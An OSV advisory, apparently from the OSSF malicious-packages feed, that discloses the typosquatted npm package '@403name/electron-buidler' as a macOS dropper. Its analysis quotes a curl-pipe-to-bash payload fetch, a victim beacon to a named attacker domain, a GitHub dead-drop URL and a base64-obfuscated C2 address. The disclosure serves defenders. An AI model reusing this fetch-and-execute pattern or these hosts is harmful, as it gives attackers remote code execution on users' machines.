{"id":"MAL-2026-5547","summary":"Malicious code in @403name/electron-buidler (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (6ed72e6dbbdb78cd8fc99bfafc15900f16543690460ae2cfad826aeee20c05a4)\nOn require(), index.js executes an immediately-invoked function that platform-gates to macOS, skips CI environments, drops a one-shot marker file in ~/.cache/.nyx-npm/eb, then after a 30-90 second random delay performs two attacker-controlled network operations. First, it issues a curl GET to https://k7xm9q.xyz/api/clickfix-callback carrying a beacon ID, $USER, os.hostname(), and the literal tag 'npm_electron-buidler' as query parameters, identifying the victim to the attacker. Second, it fetches a dead-drop file at https://raw.githubusercontent.com/nyx-deploy/config/main/c2.txt to learn a C2 base (base64-encoded fallback decodes to https://k7xm9q.xyz), then pipes `curl -sSfL \u003cC2\u003e/api/payload/ | /bin/bash` via spawn('/bin/sh','-c',...) with `& disown` to detach the shell. The C2 host is concealed via atob('aHR0cHM6Ly9rN3htOXEueHl6'). The package name '@403name/electron-buidler' is a one-character typo of the popular 'electron-builder' package under an unrelated scope; the README's 'Electron application builder' claim is a cover for the dropper. Importing this package on a non-CI macOS host yields full remote code execution as the installing user with attacker-controlled payload delivery and no consent.\n","modified":"2026-06-11T04:01:30.623101675Z","published":"2026-06-11T03:15:04Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-005449","source":"amazon-inspector","import_time":"2026-06-11T03:48:52.767083914Z","modified_time":"2026-06-11T03:15:04Z","versions":["1.0.1"],"sha256":"6ed72e6dbbdb78cd8fc99bfafc15900f16543690460ae2cfad826aeee20c05a4"},{"id":"IN-MAL-2026-005452","source":"amazon-inspector","import_time":"2026-06-11T03:48:53.123610268Z","modified_time":"2026-06-11T03:15:24Z","versions":["1.0.0"],"sha256":"bf81a596bee9d4858a18bd26f5037bfdab52f11400c3590dc8b99b6e3e1daa53"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@403name/electron-buidler/v/1.0.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@403name/electron-buidler/v/1.0.0"}],"affected":[{"package":{"name":"@403name/electron-buidler","ecosystem":"npm","purl":"pkg:npm/%40403name%2Felectron-buidler"},"versions":["1.0.1","1.0.0"],"database_specific":{"indicators":{"evidence_files":[{"tlsh":"5da144cd7be73230272311a6da2f980e65be8912154ed918741c93ce1fe07a0926ddfd","path":"index.js","sha256":"610475c54a6f7c8a3ca10f849b6fd413f5a50c32d691f4d88db846dc439ee035"},{"tlsh":"da012871dd205d7307cc1a519e670d48e1764c1f8c9cbc1833e2821c476e4bb21be65e","path":"package.json","sha256":"ace6a81005f9598641133284dd34ee69c1dc97289ef3303cc87408077dd1d29f"}],"package_integrity":[{"hashes":{"sha1":"416b573a7170e0a4686d544b9cd229e8b6b9fef3","sha512_sri":"sha512-M7/NtNOvNpPl4dzY1vfETFOVl5Yaih1W/HzVBHFzpLjb1A9lbEeqBk8FNW/f8mxkIkMDabmAmfH/EyvytMcf9Q=="},"filename":"electron-buidler-1.0.1.tgz"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@403name/electron-buidler/MAL-2026-5547.json","cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}